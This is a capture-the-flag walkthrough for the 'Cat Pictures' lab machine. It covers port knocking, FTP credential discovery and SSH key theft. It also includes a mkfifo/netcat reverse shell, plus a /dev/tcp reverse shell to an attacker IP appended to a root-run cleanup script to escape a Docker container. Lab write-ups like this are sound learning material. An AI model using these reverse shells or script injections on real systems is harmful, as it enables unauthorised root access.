# Cat Pictures ## Nmap ``` sudo nmap 10.10.217.166 -p- -sS -sV PORT STATE SERVICE VERSION 21/tcp filtered ftp 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 53/tcp filtered domain 2375/tcp filtered docker 4420/tcp open nvm-express? 8080/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27) ``` Interestingly `Nmap` shows that port 21 is filtered which we can take note of. Running netcat against port 4420 appears to show a login for a shell. Unfortunately I was unable to proceed attempting common passwords. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2e3d99affc22896e651d66c45d20e12220f6f1bf%2Fimage.png?alt=media) Over on port 8080 we have a landing page for phpBB forums. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b7d1cb7f41fbe669fed4161fba5b13c05c9b62b5%2Fimage.png?alt=media) From here I tried to register an account and was unsuccessful regarding an error regarding 'Invalid MX domain'. Looking at the only thread created by the site admin we see a potential reference to port knocking. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a381e617f330d9b1110070b48dfc1591296da180%2Fimage.png?alt=media) We can perform port knocking as per the bash command below in order to use Nmap to 'knock' the ports in sequence. After completion scanning the ports on the target again should open one of them. ```bash for i in 1111 2222 3333 4444;do nmap -Pn -p $i --host-timeout 201 --max-retries 0 ; done ``` ```bash sudo nmap 10.10.217.166 -F -sS PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 53/tcp filtered domain 8080/tcp open http-proxy ``` We can now connect to the FTP. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6bdd7f7846707580fc8c98d241835d6785c5880c%2Fimage.png?alt=media) Reading the contents of note.txt we are given the internal shell password. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6bd2b9dbcd8e0c6cabb9c61bdd186f8b3c4d5f67%2Fimage.png?alt=media) After entering the password over `netcat` to port 4420 we now appear to have access to the target system. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-165323bd6df232c56a9e3b3724b0d1d956bafaaa%2Fimage.png?alt=media) From here I checked the installed software under /bin/ and found `netcat` to be installed. As such I opted to get a more usable `netcat` reverse shell. ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc >/tmp/f ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6543699a48b492d5e23d3491ed3b2dbb2dada0db%2Fimage.png?alt=media) From here checking home directory contents we see the user catlover has a file called runme in the home directory. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-26d3fb277ae81b9e779a6679c3b3e2421e5da765%2Fimage.png?alt=media) When running the file we are asked for a password to proceed. I tried the shell service password which was incorrect. From here I run cat on the file to view the contents and noticed the string 'rebecca' before the output asking for a password. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6b222f788b6158f37d21ba59294e8205e8a3c019%2Fimage.png?alt=media) Entering rebecca password. we are then given the message '*Welcome, catlover! SSH key transfer queued!*'. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fdf53145dd4e8ed0e531b1001878349e7520ae12%2Fimage.png?alt=media) After a short while id\_rsa will appear in the users directory. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a6ac8388c80425253bcab9b16b0b97e47c8e2a92%2Fimage.png?alt=media) After transferring the contents of the id\_rsa to my attacking machine I then used the following `chmod` command to set the correct permissions. ```bash chmod 600 cat_rsa ``` We are then able to `SSH` in as the known user on the target machine. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-59f96cd38c0d48382101cf80c7738129a3755278%2Fimage.png?alt=media) We appear to be root. However, checking the machine hostname of 7546fa2336d6and the existence of the .dockerenv file in '/' we are more than likely in a docker container. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-138b7587695db608b551490b30e5d9c9db18c91e%2Fimage.png?alt=media) From here I noticed a file in /opt/clean.sh. Viewing the contents this looks like it is removing the contents of the /tmp/ directory. I placed some files in the directory and waited. After a short while the files had been removed from the directory. As a result I placed a bash reverse shell into clean.sh ```bash echo '0<&196;exec 196<>/dev/tcp/10.11.39.30/4422; sh <&196 >&196 2>&196' >> clean.sh ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d5e0a9337c4613859c8d019e00c927f19a4e0887%2Fimage.png?alt=media) Where we soon recieve a reverse shell as root outside the docker container. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9583e83c4dd25dba4c4e3fee617325bfa8093407%2Fimage.png?alt=media)